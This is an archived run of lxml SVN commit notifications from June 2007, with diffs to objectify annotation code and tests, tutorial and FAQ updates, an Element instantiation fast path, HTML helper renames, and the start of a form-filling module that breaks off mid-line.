it exists @@ -1505,6 +1531,38 @@ _cstr(pytype.name)) tree.END_FOR_EACH_ELEMENT_FROM(c_node) +def 
deannotate(element_or_tree, pytype=True, xsi=True): + """Recursively de-annotate the elements of an XML tree by removing 'pytype' + and/or 'type' attributes. + + If the 'pytype' keyword argument is True (the default), 'pytype' attributes + will be removed. If the 'xsi' keyword argument is True (the default), + 'xsi:type' attributes will be removed. + """ + cdef _Element element + cdef tree.xmlNode* c_node + + element = cetree.rootNodeOrRaise(element_or_tree) + c_node = element._c_node + if pytype and xsi: + tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_node, c_node, 1) + cetree.delAttributeFromNsName( + c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) + cetree.delAttributeFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "type") + tree.END_FOR_EACH_ELEMENT_FROM(c_node) + elif pytype: + tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_node, c_node, 1) + cetree.delAttributeFromNsName( + c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) + tree.END_FOR_EACH_ELEMENT_FROM(c_node) + else: + tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_node, c_node, 1) + cetree.delAttributeFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "type") + tree.END_FOR_EACH_ELEMENT_FROM(c_node) + + ################################################################################ # Module level parser setup @@ -1549,6 +1607,9 @@ XML = fromstring +cdef object _DEFAULT_NSMAP +_DEFAULT_NSMAP = { "py": PYTYPE_NAMESPACE, "xsi": XML_SCHEMA_INSTANCE_NS } + def Element(_tag, attrib=None, nsmap=None, _pytype=None, **_attributes): """Objectify specific version of the lxml.etree Element() factory that always creates a structural (tree) element. @@ -1561,6 +1622,8 @@ _attributes = attrib if _pytype is None: _pytype = TREE_PYTYPE + if nsmap is None: + nsmap = _DEFAULT_NSMAP _attributes[PYTYPE_ATTRIBUTE] = _pytype return _makeElement(_tag, None, _attributes, nsmap) @@ -1569,11 +1632,10 @@ """Create a new element with a Python value and XML attributes taken from keyword arguments or a dictionary passed as second argument. 
- Automatically adds a 'pyval' attribute for the Python type of the value, - if the type can be identified. If '_pyval' or '_xsi' are among the + Automatically adds a 'pytype' attribute for the Python type of the value, + if the type can be identified. If '_pytype' or '_xsi' are among the keyword arguments, they will be used instead. """ - cdef _Element element if attrib is not None: if python.PyDict_Size(_attributes): attrib.update(_attributes) @@ -1581,7 +1643,10 @@ if _xsi is not None: python.PyDict_SetItem(_attributes, XML_SCHEMA_INSTANCE_TYPE_ATTR, _xsi) if _pytype is None: - _pytype = _SCHEMA_TYPE_DICT[_xsi].name + # allow for s.o. using unregistered or even wrong xsi:type names + pytype_lookup = _SCHEMA_TYPE_DICT.get(_xsi) + if pytype_lookup is not None: + _pytype = pytype_lookup.name if python._isString(_value): strval = _value Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py Wed Jun 13 14:48:21 2007 @@ -13,6 +13,10 @@ from lxml import objectify +XML_SCHEMA_INSTANCE_NS = "http://www.w3.org/2001/XMLSchema-instance" +XML_SCHEMA_INSTANCE_TYPE_ATTR = "{%s}type" % XML_SCHEMA_INSTANCE_NS +XML_SCHEMA_NIL_ATTR = "{%s}nil" % XML_SCHEMA_INSTANCE_NS + xml_str = '''\ @@ -28,7 +32,7 @@ """Test cases for lxml.objectify """ etree = etree - + def XML(self, xml): return self.etree.XML(xml, self.parser) @@ -356,20 +360,69 @@ XML = self.XML root = XML('''\ - 5 - 5 - 5 + true + false + 1 + 0 + + 5 + 5 + + 5 + 5 + 5 + 5 + 5 + 5 + 5 + 5 + 5 + 5 + + 5 + 5 + 5 + 5 + 5 + 5 + 5 + 5 + + 5 + 5 + 5 + 5 + 5 + + ''') - self.assert_(isinstance(root.a[0], objectify.IntElement)) - self.assertEquals(5, root.a[0]) - - self.assert_(isinstance(root.a[1], objectify.StringElement)) - self.assertEquals("5", root.a[1]) - - self.assert_(isinstance(root.a[2], objectify.FloatElement)) 
- self.assertEquals(5.0, root.a[2]) + for b in root.b: + self.assert_(isinstance(b, objectify.BoolElement)) + self.assertEquals(True, root.b[0]) + self.assertEquals(False, root.b[1]) + self.assertEquals(True, root.b[2]) + self.assertEquals(False, root.b[3]) + + for f in root.f: + self.assert_(isinstance(f, objectify.FloatElement)) + self.assertEquals(5, f) + + for s in root.s: + self.assert_(isinstance(s, objectify.StringElement)) + self.assertEquals("5", s) + + for l in root.l: + self.assert_(isinstance(l, objectify.LongElement)) + self.assertEquals(5l, l) + + for i in root.i: + self.assert_(isinstance(i, objectify.IntElement)) + self.assertEquals(5, i) + + self.assert_(isinstance(root.n, objectify.NoneElement)) + self.assertEquals(None, root.n) def test_type_str_sequence(self): XML = self.XML @@ -444,10 +497,11 @@ root.b = False self.assertFalse(root.b) - def test_type_annotation(self): + def test_pytype_annotation(self): XML = self.XML root = XML(u'''\ - + 5 test 1.1 @@ -456,6 +510,11 @@ 5 + 5 + 23 + 42 + 300 + 2 ''') objectify.annotate(root) @@ -470,6 +529,125 @@ self.assertEquals("none", child_types[5]) self.assertEquals(None, child_types[6]) self.assertEquals("float", child_types[7]) + self.assertEquals("float", child_types[8]) + self.assertEquals("str", child_types[9]) + self.assertEquals("int", child_types[10]) + self.assertEquals("int", child_types[11]) + self.assertEquals("int", child_types[12]) + + self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) + + def test_pytype_annotation_use_old(self): + XML = self.XML + root = XML(u'''\ + + 5 + test + 1.1 + \uF8D2 + true + + + 5 + 5 + 23 + 42 + 300 + 2 + + ''') + objectify.annotate(root, ignore_old=False) + + child_types = [ c.get(objectify.PYTYPE_ATTRIBUTE) + for c in root.iterchildren() ] + self.assertEquals("int", child_types[0]) + self.assertEquals("str", child_types[1]) + self.assertEquals("float", child_types[2]) + self.assertEquals("str", child_types[3]) + self.assertEquals("bool", child_types[4]) 
+ self.assertEquals("none", child_types[5]) + self.assertEquals(None, child_types[6]) + self.assertEquals("float", child_types[7]) + self.assertEquals("float", child_types[8]) + self.assertEquals("str", child_types[9]) + self.assertEquals("str", child_types[10]) + self.assertEquals("float", child_types[11]) + self.assertEquals("long", child_types[12]) + + self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) + + def test_deannotate(self): + XML = self.XML + root = XML(u'''\ + + 5 + test + 1.1 + \uF8D2 + true + + + 5 + 5 + 23 + 42 + 300 + 2 + + ''') + objectify.deannotate(root) + + for c in root.getiterator(): + self.assertEquals(None, c.get(XML_SCHEMA_INSTANCE_TYPE_ATTR)) + self.assertEquals(None, c.get(objectify.PYTYPE_ATTRIBUTE)) + + self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) + + def test_xsitype_deannotate(self): + XML = self.XML + root = XML(u'''\ + + 5 + test + 1.1 + \uF8D2 + true + + + 5 + 5 + 23 + 42 + 300 + 2 + + ''') + objectify.annotate(root) + objectify.deannotate(root, pytype=False) + + child_types = [ c.get(objectify.PYTYPE_ATTRIBUTE) + for c in root.iterchildren() ] + self.assertEquals("int", child_types[ 0]) + self.assertEquals("str", child_types[ 1]) + self.assertEquals("float", child_types[ 2]) + self.assertEquals("str", child_types[ 3]) + self.assertEquals("bool", child_types[ 4]) + self.assertEquals("none", child_types[ 5]) + self.assertEquals(None, child_types[ 6]) + self.assertEquals("float", child_types[ 7]) + self.assertEquals("float", child_types[ 8]) + self.assertEquals("str", child_types[ 9]) + self.assertEquals("int", child_types[10]) + self.assertEquals("int", child_types[11]) + self.assertEquals("int", child_types[12]) + + self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) + + for c in root.getiterator(): + self.assertEquals(None, c.get(XML_SCHEMA_INSTANCE_TYPE_ATTR)) def test_change_pytype_attribute(self): XML = self.XML @@ -890,7 +1068,6 @@ etree.tostring(new_root), etree.tostring(root)) - def 
test_suite(): suite = unittest.TestSuite() suite.addTests([unittest.makeSuite(ObjectifyTestCase)]) From scoder at codespeak.net Wed Jun 13 19:25:26 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 13 Jun 2007 19:25:26 +0200 (CEST) Subject: [Lxml-checkins] r44232 - lxml/branch/lxml-1.3/doc Message-ID: <20070613172526.67E6A8208@code0.codespeak.net> Author: scoder Date: Wed Jun 13 19:25:25 2007 New Revision: 44232 Added: lxml/branch/lxml-1.3/doc/tutorial.txt - copied unchanged from r44231, lxml/trunk/doc/tutorial.txt Log: copied over the tutorial From scoder at codespeak.net Wed Jun 13 19:32:26 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 13 Jun 2007 19:32:26 +0200 (CEST) Subject: [Lxml-checkins] r44233 - lxml/branch/lxml-1.3/doc Message-ID: <20070613173226.182B681C8@code0.codespeak.net> Author: scoder Date: Wed Jun 13 19:32:25 2007 New Revision: 44233 Modified: lxml/branch/lxml-1.3/doc/tutorial.txt Log: cleaned up tutorial Modified: lxml/branch/lxml-1.3/doc/tutorial.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/tutorial.txt (original) +++ lxml/branch/lxml-1.3/doc/tutorial.txt Wed Jun 13 19:32:25 2007 @@ -327,35 +327,3 @@ tree: children, parents (or rather ancestors) and siblings. .. _`further iterators`: api.html#iteration - - -The ElementTree class -===================== - -An ``ElementTree`` is mainly a wrapper around a tree with a root node. 
- - -Parsing files and XML literals -============================== - -The XML() function ------------------- - -The parse() function --------------------- - -Namespaces -========== - - -ElementPath -=========== - -findall() ---------- - -find() ------- - -findtext() ----------- From scoder at codespeak.net Wed Jun 13 19:33:20 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 13 Jun 2007 19:33:20 +0200 (CEST) Subject: [Lxml-checkins] r44234 - lxml/branch/lxml-1.3/doc Message-ID: <20070613173320.07C2081ED@code0.codespeak.net> Author: scoder Date: Wed Jun 13 19:33:20 2007 New Revision: 44234 Modified: lxml/branch/lxml-1.3/doc/tutorial.txt Log: cleaned up tutorial Modified: lxml/branch/lxml-1.3/doc/tutorial.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/tutorial.txt (original) +++ lxml/branch/lxml-1.3/doc/tutorial.txt Wed Jun 13 19:33:20 2007 @@ -69,7 +69,7 @@ The Element class -================= +----------------- An ``Element`` is the main container object for the ElementTree API. Most of the XML tree functionality is accessed through this class. 
Elements are From scoder at codespeak.net Wed Jun 13 19:33:42 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 13 Jun 2007 19:33:42 +0200 (CEST) Subject: [Lxml-checkins] r44235 - lxml/branch/lxml-1.3/src/lxml/tests Message-ID: <20070613173342.D203581ED@code0.codespeak.net> Author: scoder Date: Wed Jun 13 19:33:42 2007 New Revision: 44235 Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Log: run doctests from tutorial Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Wed Jun 13 19:33:42 2007 @@ -1591,6 +1591,8 @@ suite.addTests( [doctest.DocFileSuite('../../../doc/api.txt')]) suite.addTests( + [doctest.DocFileSuite('../../../doc/tutorial.txt')]) + suite.addTests( [doctest.DocFileSuite('../../../doc/parsing.txt')]) suite.addTests( [doctest.DocFileSuite('../../../doc/resolvers.txt')]) From scoder at codespeak.net Wed Jun 13 19:34:24 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 13 Jun 2007 19:34:24 +0200 (CEST) Subject: [Lxml-checkins] r44236 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070613173424.3280E81ED@code0.codespeak.net> Author: scoder Date: Wed Jun 13 19:34:23 2007 New Revision: 44236 Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx lxml/branch/lxml-1.3/src/lxml/etree_defs.h lxml/branch/lxml-1.3/src/lxml/python.pxd Log: merged in fast path for Element instantiation from trunk Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Wed Jun 13 19:34:23 2007 @@ -1038,6 +1038,10 @@ else: ELEMENT_CREATION_LOCK = NULL +cdef extern from "etree_defs.h": + # macro call to 't->tp_new()' for fast instantiation + cdef _Element 
NEW_ELEMENT "PY_NEW" (object t) + cdef _Element _elementFactory(_Document doc, xmlNode* c_node): cdef python.PyThreadState* state cdef _Element result @@ -1056,9 +1060,13 @@ python.PyThread_release_lock(ELEMENT_CREATION_LOCK) return result - element_class = LOOKUP_ELEMENT_CLASS(ELEMENT_CLASS_LOOKUP_STATE, - doc, c_node) - result = element_class() + element_class = LOOKUP_ELEMENT_CLASS( + ELEMENT_CLASS_LOOKUP_STATE, doc, c_node) + if element_class is _Element: + # fast path for standard _Element class + result = NEW_ELEMENT(_Element) + else: + result = element_class() result._doc = doc result._c_node = c_node registerProxy(result) @@ -1066,7 +1074,8 @@ if config.ENABLE_THREADING: python.PyThread_release_lock(ELEMENT_CREATION_LOCK) - result._init() + if element_class is not _Element: + result._init() return result Modified: lxml/branch/lxml-1.3/src/lxml/etree_defs.h ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree_defs.h (original) +++ lxml/branch/lxml-1.3/src/lxml/etree_defs.h Wed Jun 13 19:34:23 2007 @@ -64,6 +64,16 @@ #define iter(o) PyObject_GetIter(o) #define _cstr(s) PyString_AS_STRING(s) +static PyObject* __PY_NEW_GLOBAL_EMPTY_TUPLE = NULL; + +#define PY_NEW(T) \ + (((PyTypeObject*)(T))->tp_new( \ + (PyTypeObject*)(T), \ + ((__PY_NEW_GLOBAL_EMPTY_TUPLE == NULL) ? 
\ + (__PY_NEW_GLOBAL_EMPTY_TUPLE = PyTuple_New(0)) : \ + (__PY_NEW_GLOBAL_EMPTY_TUPLE)), \ + NULL)) + #define _isString(obj) PyObject_TypeCheck(obj, &PyBaseString_Type) #define _isElement(c_node) \ Modified: lxml/branch/lxml-1.3/src/lxml/python.pxd ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/python.pxd (original) +++ lxml/branch/lxml-1.3/src/lxml/python.pxd Wed Jun 13 19:34:23 2007 @@ -112,3 +112,4 @@ cdef object repr(object obj) cdef object iter(object obj) cdef char* _cstr(object s) + cdef object PY_NEW(object t) From scoder at codespeak.net Wed Jun 13 19:36:29 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 13 Jun 2007 19:36:29 +0200 (CEST) Subject: [Lxml-checkins] r44237 - lxml/branch/lxml-1.3/doc Message-ID: <20070613173629.DB12A81ED@code0.codespeak.net> Author: scoder Date: Wed Jun 13 19:36:29 2007 New Revision: 44237 Modified: lxml/branch/lxml-1.3/doc/FAQ.txt Log: ReST fix Modified: lxml/branch/lxml-1.3/doc/FAQ.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/FAQ.txt (original) +++ lxml/branch/lxml-1.3/doc/FAQ.txt Wed Jun 13 19:36:29 2007 @@ -96,16 +96,16 @@ * Try to use versions of both libraries that were released together. * If you use XML Schema or Schematron which are still under development, the -most recent version of libxml2 is usually a good bet. + most recent version of libxml2 is usually a good bet. * The same applies to XPath, where a substantial number of bugs and memory -leaks were fixed over time. If you encounter crashes or memory leaks in XPath -applications, try a more recent version of libxml2. + leaks were fixed over time. If you encounter crashes or memory leaks in XPath + applications, try a more recent version of libxml2. * For parsing and fixing broken HTML, lxml requires at least libxml2 2.6.21. 
* For the normal tree handling, however, any libxml2 version starting with -2.6.16 should do. + 2.6.16 should do. Read the `release notes of libxml2`_ and the `release notes of libxslt`_ to see if a specific bug has been fixed. From scoder at codespeak.net Wed Jun 13 19:48:37 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 13 Jun 2007 19:48:37 +0200 (CEST) Subject: [Lxml-checkins] r44238 - lxml/branch/lxml-1.3/doc Message-ID: <20070613174837.8DACC820F@code0.codespeak.net> Author: scoder Date: Wed Jun 13 19:48:37 2007 New Revision: 44238 Modified: lxml/branch/lxml-1.3/doc/FAQ.txt Log: link to the tutorial from the FAQ and make clear we appreciate any help here Modified: lxml/branch/lxml-1.3/doc/FAQ.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/FAQ.txt (original) +++ lxml/branch/lxml-1.3/doc/FAQ.txt Wed Jun 13 19:48:37 2007 @@ -46,10 +46,16 @@ Is there a tutorial? -------------------- -There is a `tutorial for ElementTree`_ which also works for ``lxml.etree``. +Read the `lxml.etree Tutorial`_. While this is still work in progress (just +as any good documentation), it provides an overview of the most important +concepts in ``lxml.etree``. If you want to help out, the tutorial is a very +good place to start. + +There is also a `tutorial for ElementTree`_ which works for ``lxml.etree``. The `API documentation`_ also contains many examples for ``lxml.etree``. To learn using ``lxml.objectify``, read the `objectify documentation`_. +.. _`lxml.etree Tutorial`: tutorial.html .. _`tutorial for ElementTree`: http://effbot.org/zone/element.htm .. _`API documentation`: api.html .. _`objectify documentation`: objectify.html @@ -251,6 +257,11 @@ .. _ReST: http://docutils.sourceforge.net/rst.html .. _`text files`: http://codespeak.net/svn/lxml/trunk/doc/ +* help with the tutorial. 
A tutorial is the most important starting point for + new users, so it is important for us to provide an easy to understand guide + into lxml. As all documentation, the tutorial is work in progress, so we + appreciate every helping hand. + * improve the docstrings. lxml uses docstrings to support Python's integrated online ``help()`` function. However, sometimes these are not sufficient to grasp the details of the function in question. If you find such a place, From scoder at codespeak.net Wed Jun 13 19:49:32 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 13 Jun 2007 19:49:32 +0200 (CEST) Subject: [Lxml-checkins] r44239 - lxml/trunk/doc Message-ID: <20070613174932.7A01E8210@code0.codespeak.net> Author: scoder Date: Wed Jun 13 19:49:32 2007 New Revision: 44239 Modified: lxml/trunk/doc/FAQ.txt Log: link to the tutorial from the FAQ and make clear we appreciate any help here Modified: lxml/trunk/doc/FAQ.txt ============================================================================== --- lxml/trunk/doc/FAQ.txt (original) +++ lxml/trunk/doc/FAQ.txt Wed Jun 13 19:49:32 2007 @@ -51,10 +51,16 @@ Is there a tutorial? -------------------- -There is a `tutorial for ElementTree`_ which also works for ``lxml.etree``. +Read the `lxml.etree Tutorial`_. While this is still work in progress (just +as any good documentation), it provides an overview of the most important +concepts in ``lxml.etree``. If you want to help out, the tutorial is a very +good place to start. + +There is also a `tutorial for ElementTree`_ which works for ``lxml.etree``. The `API documentation`_ also contains many examples for ``lxml.etree``. To learn using ``lxml.objectify``, read the `objectify documentation`_. +.. _`lxml.etree Tutorial`: tutorial.html .. _`tutorial for ElementTree`: http://effbot.org/zone/element.htm .. _`API documentation`: api.html .. _`objectify documentation`: objectify.html @@ -256,6 +262,11 @@ .. _ReST: http://docutils.sourceforge.net/rst.html .. 
_`text files`: http://codespeak.net/svn/lxml/trunk/doc/ +* help with the tutorial. A tutorial is the most important starting point for + new users, so it is important for us to provide an easy to understand guide + into lxml. As all documentation, the tutorial is work in progress, so we + appreciate every helping hand. + * improve the docstrings. lxml uses docstrings to support Python's integrated online ``help()`` function. However, sometimes these are not sufficient to grasp the details of the function in question. If you find such a place, From scoder at codespeak.net Wed Jun 13 19:58:05 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 13 Jun 2007 19:58:05 +0200 (CEST) Subject: [Lxml-checkins] r44240 - lxml/branch/lxml-1.3/doc Message-ID: <20070613175805.C0EAC8215@code0.codespeak.net> Author: scoder Date: Wed Jun 13 19:58:05 2007 New Revision: 44240 Modified: lxml/branch/lxml-1.3/doc/tutorial.txt Log: updated toc in tutorial Modified: lxml/branch/lxml-1.3/doc/tutorial.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/tutorial.txt (original) +++ lxml/branch/lxml-1.3/doc/tutorial.txt Wed Jun 13 19:58:05 2007 @@ -13,17 +13,11 @@ .. contents:: .. - 1 Elements and ElementTrees - 1.1 The Element class - 1.2 The ElementTree class - 2 Parsing and XML literals - 2.1 The XML() function - 2.2 The parse() function - 3 Namespaces - 4 The find*() methods - 4.1 findall() - 4.2 find() - 4.3 findtext() + 1 The Element class + 2 Elements are lists + 3 Elements carry attributes + 4 Elements contain text + 5 Tree iteration A common way to import ``lxml.etree`` is as follows:: From scoder at codespeak.net Wed Jun 13 21:16:10 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 13 Jun 2007 21:16:10 +0200 (CEST) Subject: [Lxml-checkins] r44241 - in lxml/branch/html/src/lxml/html: . 
tests Message-ID: <20070613191610.EA5F08210@code0.codespeak.net> Author: scoder Date: Wed Jun 13 21:16:09 2007 New Revision: 44241 Modified: lxml/branch/html/src/lxml/html/__init__.py lxml/branch/html/src/lxml/html/clean.py lxml/branch/html/src/lxml/html/diff.py lxml/branch/html/src/lxml/html/tests/test_basic.txt Log: renamed drop_element() back to drop_tag() Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Wed Jun 13 21:16:09 2007 @@ -35,7 +35,7 @@ previous.tail = (previous.tail or '') + self.tail parent.remove(self) - def drop_element(self): + def drop_tag(self): """ Remove the tag, but not its children or text. The children and text are merged into the parent. @@ -43,7 +43,7 @@ Example:: >>> h = parse_element('
Hello World!
') - >>> h.find('//b').drop_element() + >>> h.find('//b').drop_tag() >>> print tostring(h)
Hello World!
""" Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Wed Jun 13 21:16:09 2007 @@ -290,7 +290,7 @@ for el in _kill: el.drop_tree() for el in _remove: - el.drop_element() + el.drop_tag() if remove_unknown_tags: if allow_tags: @@ -304,7 +304,7 @@ bad.append(el) if strip_tags: for el in bad: - el.drop_element() + el.drop_tag() else: for el in bad: el.drop_tree() Modified: lxml/branch/html/src/lxml/html/diff.py ============================================================================== --- lxml/branch/html/src/lxml/html/diff.py (original) +++ lxml/branch/html/src/lxml/html/diff.py Wed Jun 13 21:16:09 2007 @@ -770,7 +770,7 @@ if not _contains_block_level_tag(el): continue _move_el_inside_block(el, tag=tag) - el.drop_element() + el.drop_tag() #_merge_element_contents(el) def _contains_block_level_tag(el): Modified: lxml/branch/html/src/lxml/html/tests/test_basic.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_basic.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_basic.txt Wed Jun 13 21:16:09 2007 @@ -63,7 +63,7 @@ ...
footer
... ... ''') - >>> doc.get_element_by_id('link').drop_element() + >>> doc.get_element_by_id('link').drop_tag() >>> print tostring(doc) From scoder at codespeak.net Thu Jun 14 07:49:02 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 14 Jun 2007 07:49:02 +0200 (CEST) Subject: [Lxml-checkins] r44244 - in lxml/branch/html/src/lxml/html: . tests Message-ID: <20070614054902.BF650822E@code0.codespeak.net> Author: scoder Date: Thu Jun 14 07:49:01 2007 New Revision: 44244 Modified: lxml/branch/html/src/lxml/html/__init__.py lxml/branch/html/src/lxml/html/tests/test_basic.txt Log: prevent comment text from being merged into the document in drop_tag() Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Thu Jun 14 07:49:01 2007 @@ -50,7 +50,8 @@ parent = self.getparent() assert parent is not None previous = self.getprevious() - if self.text: + if self.text and isinstance(self.tag, basestring): + # not a Comment, etc. if previous is None: parent.text = (parent.text or '') + self.text else: Modified: lxml/branch/html/src/lxml/html/tests/test_basic.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_basic.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_basic.txt Thu Jun 14 07:49:01 2007 @@ -1,5 +1,6 @@ lxml.html adds a find_class method to elements:: + >>> from lxml.etree import Comment >>> from lxml.html import HTML, tostring, parse_element >>> from lxml.html.clean import clean, clean_html >>> from lxml.html import usedoctest @@ -60,6 +61,7 @@ ...
... This is a test of stuff. ...
+ ... ...
footer
... ... ''') @@ -70,6 +72,7 @@
This is a test of stuff.
+
footer
@@ -77,6 +80,19 @@ >>> print tostring(doc) + +
footer
+ + + +Note, however, that comment text will not be merged into the tree when you +drop the comment. Here, ``drop_tag()`` behaves exactly like ``drop_tree()``: + + >>> for comment in doc.getiterator(Comment): + ... comment.drop_tag() + >>> print tostring(doc) + +
footer
From scoder at codespeak.net Thu Jun 14 08:04:56 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 14 Jun 2007 08:04:56 +0200 (CEST) Subject: [Lxml-checkins] r44245 - lxml/branch/html/src/lxml Message-ID: <20070614060456.71FA7822D@code0.codespeak.net> Author: scoder Date: Thu Jun 14 08:04:55 2007 New Revision: 44245 Modified: lxml/branch/html/src/lxml/classlookup.pxi Log: copy'n'paste bug Modified: lxml/branch/html/src/lxml/classlookup.pxi ============================================================================== --- lxml/branch/html/src/lxml/classlookup.pxi (original) +++ lxml/branch/html/src/lxml/classlookup.pxi Thu Jun 14 08:04:55 2007 @@ -122,8 +122,8 @@ if entity is None: self.entity_class = None - elif issubclass(pi, EntityBase): - self.entity_class = pi + elif issubclass(entity, EntityBase): + self.entity_class = entity else: raise TypeError, "Entity class must be subclass of EntityBase" From scoder at codespeak.net Thu Jun 14 08:06:52 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 14 Jun 2007 08:06:52 +0200 (CEST) Subject: [Lxml-checkins] r44246 - lxml/trunk/src/lxml Message-ID: <20070614060652.4B0EF822D@code0.codespeak.net> Author: scoder Date: Thu Jun 14 08:06:51 2007 New Revision: 44246 Modified: lxml/trunk/src/lxml/classlookup.pxi Log: copy'n'paste bug Modified: lxml/trunk/src/lxml/classlookup.pxi ============================================================================== --- lxml/trunk/src/lxml/classlookup.pxi (original) +++ lxml/trunk/src/lxml/classlookup.pxi Thu Jun 14 08:06:51 2007 @@ -122,8 +122,8 @@ if entity is None: self.entity_class = None - elif issubclass(pi, EntityBase): - self.entity_class = pi + elif issubclass(entity, EntityBase): + self.entity_class = entity else: raise TypeError, "Entity class must be subclass of EntityBase" From scoder at codespeak.net Thu Jun 14 08:07:23 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 14 Jun 2007 08:07:23 +0200 (CEST) 
Subject: [Lxml-checkins] r44247 - lxml/branch/html/src/lxml/html Message-ID: <20070614060723.B4584822E@code0.codespeak.net> Author: scoder Date: Thu Jun 14 08:07:23 2007 New Revision: 44247 Modified: lxml/branch/html/src/lxml/html/__init__.py Log: support entities Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Thu Jun 14 08:07:23 2007 @@ -272,9 +272,13 @@ class HtmlProcessingInstruction(etree.PIBase, HtmlMixin): pass +class HtmlEntity(etree.EntityBase, HtmlMixin): + pass + html_parser = etree.HTMLParser() html_parser.setElementClassLookup(etree.ElementDefaultClassLookup( - element=HtmlElement, comment=HtmlComment, pi=HtmlProcessingInstruction)) + element=HtmlElement, comment=HtmlComment, + pi=HtmlProcessingInstruction, entity=HtmlEntity)) def HTML(html): # FIXME: should this notice a fragment and parse accordingly? From ianb at codespeak.net Fri Jun 15 00:04:12 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 15 Jun 2007 00:04:12 +0200 (CEST) Subject: [Lxml-checkins] r44252 - in lxml/branch/html/src/lxml/html: . 
tests Message-ID: <20070614220412.32475827B@code0.codespeak.net> Author: ianb Date: Fri Jun 15 00:04:11 2007 New Revision: 44252 Added: lxml/branch/html/src/lxml/html/formfill.py lxml/branch/html/src/lxml/html/tests/test_formfill.py lxml/branch/html/src/lxml/html/tests/test_formfill.txt Log: Added a form filling module; not fully tested yet Added: lxml/branch/html/src/lxml/html/formfill.py ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/formfill.py Fri Jun 15 00:04:11 2007 @@ -0,0 +1,166 @@ +from lxml.etree import XPath +from lxml.html import HTML, tostring + +__all__ = ['FormNotFound', 'fill_form'] + +class FormNotFound(LookupError): + """ + Raised when no form can be found + """ + +_form_name_xpath = XPath('descendant-or-self::form[name=$name]') +_input_xpath = XPath('descendant-or-self::input | descendant-or-self::select | descendant-or-self::textarea') + +def fill_form( + el, + values, + form_id=None, + form_index=None, + ): + el = _find_form(el, form_id=form_id, form_index=form_index) + _fill_form(el, values) + +def fill_form_html(html, values, form_id=None, form_index=None): + if isinstance(html, basestring): + doc = HTML(html) + return_string = True + else: + doc = copy.deepcopy(html) + return_string = False + fill_form(doc, values, form_id=form_id, form_index=form_index) + if return_string: + return tostring(doc) + else: + return doc + +def _fill_form(el, values): + counts = {} + if hasattr(values, 'mixed'): + # For Paste request parameters + values = values.mixed() + inputs = _input_xpath(el) + for input in inputs: + name = input.get('name') + if not name: + continue + if _takes_multiple(input): + value = values.get(name, []) + if not isinstance(value, (list, tuple)): + value = [value] + _fill_multiple(input, value) + elif name not in values: + continue + else: + index = counts.get(name, 0) + counts[name] = index + 1 + value = values[name] + if isinstance(value, (list, 
